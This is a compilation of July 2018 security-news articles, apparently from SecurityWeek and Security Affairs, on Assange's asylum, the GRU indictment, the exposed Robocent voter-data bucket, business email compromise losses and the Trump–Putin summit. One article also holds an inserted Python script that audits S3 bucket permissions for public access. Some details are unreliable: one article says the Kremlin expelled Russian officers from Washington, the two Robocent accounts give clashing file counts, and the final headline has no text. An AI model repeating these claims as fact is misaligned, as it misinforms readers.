In 2012 a British judge ruled that WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and has spent the years since in its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week; this means that Assange will have to leave the embassy and British authorities will arrest him.

“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly elected President of Ecuador, Lenín Moreno, arrived in London on Friday. Officially, the purpose of his trip is to participate in the Global Disability Summit on 24 July 2018, but media reports suggest he was reaching an agreement with the UK government to withdraw Assange's asylum protection.

“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 2018 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald (@ggreenwald), 20 Jul 2018:

"The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …"

"Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?"

"The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that."

In May 2017, Swedish prosecutors dropped their preliminary investigation into an allegation of rape against Julian Assange, but the WikiLeaks founder fears that he would be extradited to the US, where he is facing federal charges over his role in the Chelsea Manning case.

Julian Assange

Three months ago, Ecuador blocked Assange from accessing the internet, mainly to prevent him from expressing support for Catalonia in its independence dispute with the Spanish government.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

What are the current charges against Assange in the UK?

The only criminal proceeding against Assange is a pending 2012 arrest warrant for “failure to surrender,” which experts consider a minor bail violation charge.

This charge carries a prison term of three months and a fine, though it is possible that the time Assange has already spent in prison in the UK could be counted against that sentence.

Industry Reactions to U.S. Indicting 12 Russians for DNC Hack
20.7.2018 securityweek BigBrothers

The U.S. last week indicted 12 Russian intelligence officers over their alleged role in a hacking operation targeting the Democratic National Committee (DNC) and Hillary Clinton’s 2016 presidential campaign.

The charges, part of special counsel Robert Mueller’s investigation into Russia’s attempt to interfere in the presidential election, were announced just days before President Donald Trump met his Russian counterpart, Vladimir Putin.

Industry professionals have commented on the charges, their impact, the possible threat actors responsible for the operation, and how these types of attacks can be avoided.

And the feedback begins...

John Hultquist, Director of Intelligence Analysis, FireEye:

“While we had already been aware of much of the information covered in the indictment, there were several interesting insights into the organizations that lie behind the intrusion operators we track. In particular, the document indicates that more than one GRU unit was involved in efforts to undermine the elections. The first of these units, Unit 26165, resembles APT28, the operator who we originally suspected of carrying out the DNC incident. The second of these two units, Unit 74455, is implicated in incidents affecting election systems.

We have been actively tracking an actor we believe was tied to those incidents, and have found some connection between those incidents and others, such as efforts to target the 2017 French elections, and disruptive attacks on the 2018 Olympics, as well as other incidents. Ultimately, though much of their activity remains opaque, we believe GRU organizations have been behind many of the most aggressive incidents in recent memory, including the economically devastating NotPetya attacks and attacks on Ukraine’s grid.”

John Gomez, CEO, Sensato:

“When you consider all that is going on and developing with the Russian hackers, it is important to note that we are very much in the embryonic stages of learning what, specifically, occurred. As more and more comes to light, I suspect we will come to appreciate the high level of sophistication that was employed to carry out the attacks. This attack was planned far in advance. It relied upon the coordination of various assets, including the development of fake personas, the recruitment of cybercriminals, monitoring news feeds, and establishing on-the-ground assets that could be plied for information and intelligence. The attackers timed the attacks to shake confidence and cause confusion.

Although the Russian hackers targeted our government, the real lesson here is that this level of sophistication is not isolated to the Russian hackers identified in the U.S Federal indictment. Rather, we are seeing that other criminal organizations, nation states, and even terrorists are employing the same level of sophistication in their operations. This development with Russia simply highlights what many of us have known all along: Attackers, regardless of motivation, have matured their tactics, techniques, and procedures. They’re innovating at a pace that far outstrips the defenses that most organizations have erected. Even basic attacks, such as phishing, are not the same approaches used a few years ago.

We may be appalled, shocked, and even outraged. Yet, maybe the biggest lesson is that despite all efforts, we failed at protecting one of our most treasured assets--the democratic process. What is more appalling is that many will continue to believe that the adversaries our IT organizations faced just a few years ago are the same adversaries our IT organizations face today. Hopefully, what has occurred with Russia will be a wake-up call, not only at the national level, but within our own organizations. If Russia can manipulate an electoral process, what could they and other, highly focused, well-funded cyber attackers do to our economy, our healthcare organizations, and other critical infrastructure systems like transportation or communications?”

Richard Ford, Chief Scientist, Forcepoint:

“We shouldn’t be distracted by talks of how they did this or why but instead – how will the international community respond to these types of asymmetric attacks that impact the very core of our democratic process? While an indictment is a nice gesture, it has few real consequences beyond drawing yet more attention to the issue.

Cybersecurity knows no borders, and so it is relatively easy for a nation state – or even an enthusiastic group of individuals – to launch attacks from the safety of their own country that can be impactful but carry very little personal risk. How we decide to treat these offensive cyber operations is one of the most pressing questions of our time, and those questions cannot be answered by governments alone. Attacks often involve third-party infrastructure, and vulnerabilities in this infrastructure have to be addressed by those in the commercial world.

It’s time for us as an international community to truly come together and determine not only what constitutes acceptable behavior online at the nation state level, but what checks and balances can be meaningfully put in place to those states that refuse to adhere to these agreed upon practices.”

Ross Rustici, Head of Intelligence Research, Cybereason:

"This further confirms the links already exposed from the indictments related to the social media influence campaigns. The concentrated effort of the Russian state to influence the election is undeniable. The most surprising thing about this is not only the relative ease of the intrusions but the widespread campaign perpetrated by the GRU. This only serves to reinforce the dramatic changes that the internet has brought to influence operations around the world. The ease with which intelligence agencies can have a direct influence in the information age is something that they could only dream of during the Cold War."

Kevin Mitnick, Chief Hacking Officer, KnowBe4:

“After reading the Russian indictment I was surprised to see that the Russians use the same exact methods we use to test our clients' security controls. Our security engineers have never failed to get in when we can use social engineering (phishing, etc.) during an assessment.

The biggest takeaway was that spearphishing is *still* the easiest way the bad guys get in. Why the DNC didn't use Multi-Factor Authentication is beyond me. I believe it is the lack of security awareness training that made it easy for the Russians to hack our election.”

Leo Taddeo, CISO, Cyxtera:

“The indictment teaches cyber security professionals several important lessons. Many legacy security solutions, even when used in combination, simply aren’t designed to mitigate the risks presented by today's adversaries.

A user-centric, context-aware model is non-negotiable – Access controls that require only user name and password are effectively useless. Given the seemingly unstoppable effectiveness of spearphishing, enterprises must assume that one or more of their users has had their credentials compromised. An effective security solution must do more than just verify a user name and password. It must be able to tell if the context of a remote connection is suspicious, such as if it originates from an unusual location or time of day, or from a device with no antivirus software installed. It should also be able to ask for additional authentication steps like one-time passwords (OTP), adjust user permissions on the fly and ultimately block access according to the level of risk. To accomplish this, organizations must adopt a user-centric, context-aware model that is built on the principle of least privilege.

Authenticate first, connect second – The indictment specifically calls out that the conspirators conducted scanning on the network IP protocols. The fundamental reason for this vulnerability is that TCP/IP – which was originally designed to operate in an environment where the user community knew and trusted each other – is based on implicit trust, with a “connect first, authenticate second” approach. In today’s hyperconnected and highly adversarial threat landscape, this approach puts organizations at risk. Alternate access control technologies, such as Software-Defined Perimeter (SDP), are built on an “authenticate first, connect second” approach, ensuring that only authorized users can connect to network resources. This reduces the attack surface and significantly improves security. With Software Defined Perimeter, all resources are invisible to the dangerous reconnaissance techniques outlined in the indictment.

Manage the risks of third-party access – The indictment reveals the conspirators hacked into the DNC’s computers through their access to the DCCC network. Then, they installed and managed different types of malware to explore the DNC network and steal documents. This highlights the need for organizations to better manage the risks of third-party access. By using a solution that leverages the Software-Defined Perimeter (SDP) security framework, organizations can ensure that all endpoints attempting to access a given infrastructure are authenticated and authorized prior to accessing any resources on the network. This not only applies the principle of least privilege to the network, it also reduces the attack surface area by hiding network resources from unauthorized or unauthenticated users.”

Robocalling Firm Exposes U.S. Voter Records
20.7.2018 securityweek BigBrothers

A publicly accessible Amazon Web Services S3 bucket belonging to a political autodial firm was exposing hundreds of thousands of United States voter records.

Discovered by Kromtech Security's Bob Diachenko, the misconfigured data repository is part of robocalling company Robocent’s cloud storage and had already been indexed by the searchable database GrayhatWarfare, which currently lists over 48,000 open S3 buckets.

The Virginia Beach-based political autodial firm claims to have over 10 years of combined autodial experience and to be able to “reach thousands of voters instantly.”

“Our powerful dialer can make thousands of calls a minute, ensuring large calls always meet the deadline,” Robocent notes on its website.

The company’s publicly accessible storage had 2594 listed files, which included audio files with pre-recorded political messages for robocalls (*.mp3, *.wav).

More importantly, the Amazon S3 bucket contained a large amount of voter data (in the form of *.csv, *.xls files): full name, suffix, prefix; phone numbers (cell and landlines); address with house, street, city, state, zip, precinct; age and birth year; and gender.

Other voter information found in the cloud storage included affiliation provided by state, or inferred based on voting trends/history; jurisdiction breakdown based on district, zip code, precinct, county, state; and demographics based on ethnicity, language, and education, Diachenko reveals.

Many of the files in the S3 bucket were aggregated from outside data firms such as NationalBuilder.

In addition to making political robocalls starting at 1¢ per dial, Robocent also sells voter data at only 3¢ per record. The company also advertises on its website the data points it collects.

“We provide voter files for every need, whether it be for a new robocall or simply to update records for door knocking. Our simple request process allows users to choose exactly who to target with no minimum order,” Robocent says on its website.

According to Diachenko, the company quickly secured the S3 bucket and restricted access to the files after being responsibly alerted to the issue.

“We're a small shop (I'm the only developer) so keeping track of everything can be tough,” Diachenko was told.

Over the past several years there have been numerous incidents involving voter databases, including one reported by Diachenko in December last year, in which an improperly secured MongoDB database exposed the information of the entire voting population of California: it contained 19,264,123 records.

12 Russian Intel Officers charged with hacking into U.S. Democrats
19.7.2018 securityaffairs BigBrothers

The week closes with the indictment of twelve Russian intelligence officers by a US grand jury. The charges were filed just three days before President Donald Trump is scheduled to meet with Vladimir Putin.
Special Counsel Robert Mueller, who on February 13 indicted 13 Russians for a massive operation aimed at influencing the 2016 Presidential election, has now charged 12 Russian intelligence officers working for the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“There’s no allegation in this indictment that any American citizen committed a crime,” said Rosenstein. “The conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers.”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. Russian intelligence set up servers in the U.S. and Malaysia under fake names to run their operations, and the agents paid for them with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,”

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The Democratic minority in Congress is pressing Trump to cancel the meeting with Putin, arguing that Russia intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,” he said.

The White House echoed the remark in a tweet posted at 10:03 PM on July 13, 2018: “At a press conference with U.K. Prime Minister @theresa_may, President @realDonaldTrump made it clear: ‘We have been far tougher on Russia than anybody.’”

Trump evidently believes that the hostility against Russia is a severe interference with the relationship and the collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, at least one person close to the Trump campaign and a candidate for Congress were in contact with the Russian officers.

FBI: Overall BEC/EAC losses between Oct 2013 and May 2018 reached $12 billion
19.7.2018 securityaffairs BigBrothers

The number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.
The FBI has provided further data on Email Account Compromise: according to the feds, the number of business email compromise (BEC) and email account compromise (EAC) scam incidents worldwide reached 78,000 between October 2013 and May 2018.

“Business E-mail Compromise (BEC)/E-mail Account Compromise (EAC) is a sophisticated scam targeting both businesses and individuals performing wire transfer payments.” reads the announcement published by the FBI.

“The scam is frequently carried out when a subject compromises legitimate business e-mail accounts through social engineering or computer intrusion techniques to conduct unauthorized transfers of funds.”

The number of BEC/EAC scams continues to grow and the techniques adopted by scammers are evolving, targeting small, medium, and large businesses as well as personal transactions.

Unfortunately, business email compromise (BEC) and email account compromise (EAC) scam losses worldwide increased by 136% from December 2016 to May 2018.
Overall losses between October 2013 and May 2018 result in $12 billion.

According to the FBI, the number of scam incidents in the US was 41,058, resulting in $2.9 billion in losses. The feds highlighted that most of the fraudulent transfers went to banks in China and Hong Kong as the recipients of fraudulent funds.

The authorities observed that banks in the United Kingdom, Mexico, and Turkey have also been identified recently as prominent destinations for fraudulent funds.

“The scam may not always be associated with a request for transfer of funds. A variation of the scam involves compromising legitimate business e-mail accounts and requesting Personally Identifiable Information (PII) or Wage and Tax Statement (W-2) forms for employees,” reads the announcement published by the FBI.

Scammers appear very focused on organizations in the real estate industry: from 2015 to 2017 there was a 1,100% increase in BEC/EAC victims in that sector.

“Victims most often report a spoofed e-mail being sent or received on behalf of one of these real estate transaction participants with instructions directing the recipient to change the payment type and/or payment location to a fraudulent account. The funds are usually directed to a fraudulent domestic account which quickly disperse through cash or check withdrawals,” continues the announcement.

“The funds may also be transferred to a secondary fraudulent domestic or international account. Funds sent to domestic accounts are often depleted rapidly making recovery difficult.”

Below are the BEC/EAC statistics shared by the FBI:

Domestic and international incidents: 78,617
Domestic and international exposed dollar loss: $12,536,948,299

The following BEC/EAC statistics were reported in victim complaints where a country was identified to the IC3, from October 2013 to May 2018:

Total U.S. victims: 41,058
Total U.S. exposed dollar loss: $2,935,161,457
Total non-U.S. victims: 2,565
Total non-U.S. exposed dollar loss: $671,915,009

The following BEC/EAC statistics were reported by victims via the financial transaction component of the IC3 complaint form, which became available in June 2016. These statistics were reported in victim complaints to the IC3 from June 2016 to May 2018:

Total U.S. financial recipients: 19,335
Total U.S. financial recipients exposed dollar loss: $1,629,975,562
Total non-U.S. financial recipients: 11,452
Total non-U.S. financial recipients exposed dollar loss: $1,690,788,278

According to a report published by TrendMicro in January 2018, the damage caused by Business Email Compromise (BEC) attacks to enterprises had surpassed that of previous years, and it is estimated that it could reach $9 billion in 2018.

Trump might ask Putin to extradite the 12 Russian intelligence officers
19.7.2018 securityaffairs BigBrothers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask for the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.
Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear:

“Well, I might,” Trump said.

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election, but denied that they supported his campaign, adding that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for ‘allowing’ the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had ‘much better defenses,’ Trump claimed,” CNN reported.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempts to hack the “old emails” of the Republican National Committee were first reported by CNN in January last year, quoting the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”

Director of National Intelligence warns of devastating cyber threat to US infrastructure
19.7.2018 securityaffairs BigBrothers

The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, saying that “warning lights are blinking red again.”
The Director of National Intelligence Dan Coats warned last week of a devastating cyber threat to US infrastructure, using the following words to express his concerns:

“warning lights are blinking red again”

The U.S. intelligence chief highlighted that computer networks of US government agencies, enterprises, and academic institutions are under incessant attack launched by foreign states.

Russia, North Korea, China, and Iran are the most persistent attackers; the number of their attacks continues to increase and their level of sophistication is growing too.


The Director of National Intelligence believes that Russia is the most aggressive threat actor, and recent events demonstrate it. On Friday, Special Counsel Robert Mueller, who on February 13 indicted 13 Russians for a massive operation aimed at influencing the 2016 Presidential election, charged 12 Russian intelligence officers working for the GRU with carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Of the four, “Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between the campaigns launched by China and those launched by Russia.

According to Coats, China operates with the primary intent of stealing military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin, by contrast, operates to undermine U.S. values and democratic institutions.

Coats spoke at the Hudson Institute think tank shortly after the announcement of the indictment.

Coats warned that the threat of a “crippling cyber attack on our critical infrastructure” by a nation state actor is growing.

“Coats said the U.S. government has not yet detected the kinds of cyber attacks and intrusions that officials say Russia launched against state election boards and voter data bases before the 2016 election,” Reuters reported.

“However, we fully realize that we are just one click away of the keyboard from a similar situation repeating itself,” Coats continued.

He drew a parallel between the current situation in cyberspace and the “alarming activities” that U.S. intelligence detected before al Qaeda conducted the Sept. 11, 2001 attack.

“The system was blinking red. Here we are nearly two decades later and I’m here to say the warning lights are blinking red again,” he said.

While I’m writing, President Donald Trump has arrived at Finland’s Presidential Palace for a summit with Russian President Vladimir Putin.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he might ask for the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Journalists asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear:

“Well, I might,” Trump said.

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Coats also mentioned the so-called “troll factory” operated by unnamed “individuals” affiliated with the Internet Research Agency, based in St. Petersburg, which was indicted by federal authorities in February.

These individuals have been “creating new social media accounts, masquerading as Americans and then using these accounts to draw attention to divisive issues,” he said.

Trump – Putin meeting: “I don’t see any reason” for Russia to interfere with the US presidential election
19.7.2018 securityaffairs BigBrothers

Russian President Vladimir Putin ‘just said it’s not Russia,’ and President Trump believes him.
Today the controversial meeting between Russian President Vladimir Putin and US President Donald Trump was held in Helsinki, and, as expected, the Russian President denied any interference with the 2016 US election.
After the meeting, Putin and Trump held a joint news conference and, of course, US President Trump confirmed his trust in the words of Putin.

“So I have great confidence in my intelligence people, but I will tell you that President Putin was extremely strong and powerful in his denial today,” Trump said.

Special Counsel Robert Mueller has a different opinion about Russia’s alleged interference in the 2016 Presidential election: his investigation led to the indictment of 12 Russian intelligence officials working for the GRU for carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

“I don’t see any reason” for Russia to interfere with the US presidential election: this is Trump’s view.

On Friday, director of national intelligence Daniel R. Coats warned of a devastating cyber threat to US infrastructure, he said that “warning lights are blinking red again.”

The Director of National Intelligence believes that Russia is the most aggressive threat actor and recent events demonstrate it.

“Russia has been the most aggressive foreign actor, no question,” he said.

There is a great difference between the campaigns launched by China and those launched by Russia.

According to Coats, China operates with the primary intent of stealing military and industrial secrets and has “capabilities, resources that perhaps Russia doesn’t have.” The Kremlin, by contrast, operates to undermine U.S. values and democratic institutions.

“The role of the Intelligence Community is to provide the best information and fact-based assessments possible for the President and policymakers. We have been clear in our assessments of Russian meddling in the 2016 election and their ongoing, pervasive efforts to undermine our democracy, and we will continue to provide unvarnished and objective intelligence in support of our national security,” said Coats in a press statement released after the Trump-Putin press event.

[Photo: HELSINKI, FINLAND – JULY 16: U.S. President Donald Trump (L) and Russian President Vladimir Putin answer questions about the 2016 U.S. Election collusion during a joint press conference after their summit on July 16, 2018 in Helsinki, Finland. The two leaders met one-on-one and discussed a range of issues including the 2016 U.S. Election collusion. (Photo by Chris McGrath/Getty Images)]

Below is an excerpt from the full transcript of the Helsinki press conference concerning the alleged interference in the 2016 Presidential election.

“Once again, President Trump mentioned issue of so-called interference of Russia with the American elections. I had to reiterate things I said several times, including during our personal contacts, that the Russian state has never interfered and is not going to interfere in internal American affairs, including election process. Any specific material, if such things arise, we are ready to analyze together. For instance, we can analyze them through the joint working group on cyber security, the establishment of which we discussed during our previous contacts.” said Putin.

“During today’s meeting, I addressed directly with President Putin the issue of Russian interference in our elections. I felt this was a message best delivered in person. Spent a great deal of time talking about it. And President Putin may very well want to address it and very strongly, because he feels strongly about it and he has an interesting idea. We also discussed one of the most critical challenges facing humanity, nuclear proliferation. I provided an update on my meeting last month with Chairman Kim on the denuclearization of North Korea. After today, I am very sure that President Putin and Russia want very much to end that problem. Going to work with us, and I appreciate that commitment.” said Trump.

Expert discovered RoboCent AWS S3 bucket containing US voters’ records exposed online
19.7.2018 securityaffairs BigBrothers

A security researcher has discovered that the US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.
The US political robocall firm RoboCent exposed personal details of hundreds of thousands of US voters.

The researcher Bob Diachenko from Kromtech Security discovered the company database exposed online. The expert was using the online service GrayhatWarfare that could be used to search publicly exposed Amazon Web Services data storage buckets.

The company sells voter records for a price of 3¢/record, the same data that it left exposed online.

Querying the system for the term “voters” he found the AWS bucket used by RoboCent.

The bucket discovered by the expert contained 2,584 files; the exposed voter data includes:

Full Name, suffix, prefix
Phone numbers (cell and landlines)
Address with house, street, city, state, zip, precinct
Political affiliation provided by state, or inferred based on voting trends/history
Age and birth year
Jurisdiction breakdown based on district, zip code, precinct, county, state
Demographics based on ethnicity, language, education

The server also contained audio files with prerecorded political messages used for the robo-calling service.

“Just when I thought the days of misconfigured AWS S3 buckets are over, I discovered a massive US voter data online, apparently being part of Robocent, Virginia Beach-based political autodial firm’s cloud storage.” wrote Diachenko.

“Many of the files did not originate at Robocent, but are instead the aggregate of outside data firms such as NationalBuilder.”

Diachenko responsibly disclosed the discovery to the company, which quickly secured the bucket; below is the message sent by the company developer who solved the issue.

“We’re a small shop (I’m the only developer) so keeping track of everything can be tough”

This isn’t the first case of unsecured Amazon S3 buckets exposed online: in June 2017 the DRA firm left 1.1 TB of data unsecured on an Amazon S3 bucket, exposing 198 million US voter records.

In December 2017, Diachenko discovered another exposed MongoDB database, containing voter registration data for more than 19 million California residents.
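The exposure described in both Robocent articles above comes down to a bucket whose ACL or policy lets anonymous callers list and read it. The audit helper below is an added example, not Kromtech's or Robocent's code; it evaluates a bucket's ACL, policy and public-access-block settings in the dict/JSON shapes that boto3's get_bucket_acl, get_bucket_policy and get_public_access_block return, and all sample inputs are constructed.

```python
"""Audit a bucket's ACL, policy and public-access-block settings for anonymous
listing or read access, the misconfiguration behind the Robocent exposure.

Added example: inputs follow the shapes returned by boto3's get_bucket_acl,
get_bucket_policy (a JSON string) and get_public_access_block. Sample data
below is constructed, not taken from the incident.
"""
import json

# Canned S3 groups whose grants make a bucket reachable without the owner's
# credentials (AuthenticatedUsers means any AWS account, so effectively public).
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
# Bucket-level READ is what lets a crawler enumerate every object key.
EXPOSING_ACL_PERMISSIONS = {"READ", "FULL_CONTROL"}
EXPOSING_ACTIONS = {"s3:listbucket", "s3:getobject", "s3:*", "*"}


def acl_findings(acl):
    """Return one finding per ACL grant that hands listing/read to a public group."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        group = PUBLIC_GROUPS.get(grantee.get("URI", ""))
        if (grantee.get("Type") == "Group" and group
                and grant.get("Permission") in EXPOSING_ACL_PERMISSIONS):
            findings.append(f"ACL grants {grant['Permission']} to {group}")
    return findings


def _is_anonymous(principal):
    """True for the wildcard principal forms a bucket policy can carry."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def _actions(statement):
    actions = statement.get("Action", [])
    if isinstance(actions, str):
        actions = [actions]
    return {a.lower() for a in actions}


def policy_findings(policy):
    """Return one finding per Allow statement that exposes listing/read to '*'."""
    findings = []
    if not policy:
        return findings
    if isinstance(policy, str):
        policy = json.loads(policy)
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow" or not _is_anonymous(st.get("Principal")):
            continue
        exposed = ", ".join(sorted(_actions(st) & EXPOSING_ACTIONS))
        if not exposed:
            continue
        if "Condition" in st:
            # A Condition (source IP, VPC endpoint, ...) may narrow this; flag for review.
            findings.append(f"policy allows {exposed} to anonymous principal under a Condition (review)")
        else:
            findings.append(f"policy allows {exposed} to anonymous principal")
    return findings


def audit_bucket(acl, policy=None, public_access_block=None):
    """Combine the checks; an empty list means no anonymous exposure was found.

    Simplification: IgnorePublicAcls neutralises public ACL grants and
    RestrictPublicBuckets neutralises public policy statements.
    """
    pab = public_access_block or {}
    findings = []
    if not pab.get("IgnorePublicAcls"):
        findings += acl_findings(acl)
    if not pab.get("RestrictPublicBuckets"):
        findings += policy_findings(policy)
    return findings


# Constructed sample inputs mimicking a world-listable bucket.
SAMPLE_ACL = {
    "Owner": {"ID": "constructed-owner-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "constructed-owner-id"},
         "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
         "Permission": "READ"},
    ],
}
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject",
                   "Resource": "arn:aws:s3:::constructed-bucket/*"}],
})
FULL_BLOCK = {"BlockPublicAcls": True, "IgnorePublicAcls": True,
              "BlockPublicPolicy": True, "RestrictPublicBuckets": True}

if __name__ == "__main__":
    for finding in audit_bucket(SAMPLE_ACL, SAMPLE_POLICY):
        print("FINDING:", finding)
    print("with full public access block:", audit_bucket(SAMPLE_ACL, SAMPLE_POLICY, FULL_BLOCK))
```

Feeding the real API responses in place of the constructed samples turns this into a per-bucket check that can run across an account before an indexer like GrayhatWarfare finds the bucket first.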

Russia Targeted by Almost 25 Million Cyber-Attacks During World Cup: Putin
19.7.2018 securityweek BigBrothers

Russia was the target of almost 25 million cyber-attacks during the World Cup, President Vladimir Putin said, though he did not indicate who may have been behind the attacks.

"During the period of the World Cup, almost 25 million cyber-attacks and other criminal acts on the information structures in Russia, linked in one way or another to the World Cup, were neutralised," Putin said during a meeting on Sunday with security services.

The president, whose comments were reported by the Kremlin on Monday, gave no information on the nature or possible origins of the cyber-attacks.

"Behind this (World Cup) success lies huge preparatory, operational, analytical and information work, we operated at maximum capacity and concentration," said Putin.

Russia, which hosted the World Cup from June 14 to July 15 in 11 cities and 12 stadiums, has been repeatedly accused by Western countries of conducting cyber-attacks.

On Friday, 12 Russian military intelligence officers were charged with hacking Hillary Clinton's 2016 presidential campaign and the Democratic Party in a stunning indictment three days before President Donald Trump meets with Putin in Helsinki on Monday.

The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the November 2016 vote and whether any members of Trump's campaign team colluded with Moscow.

Russia's National Vulnerability Database Slow, Incomplete
19.7.2018 securityweek BigBrothers

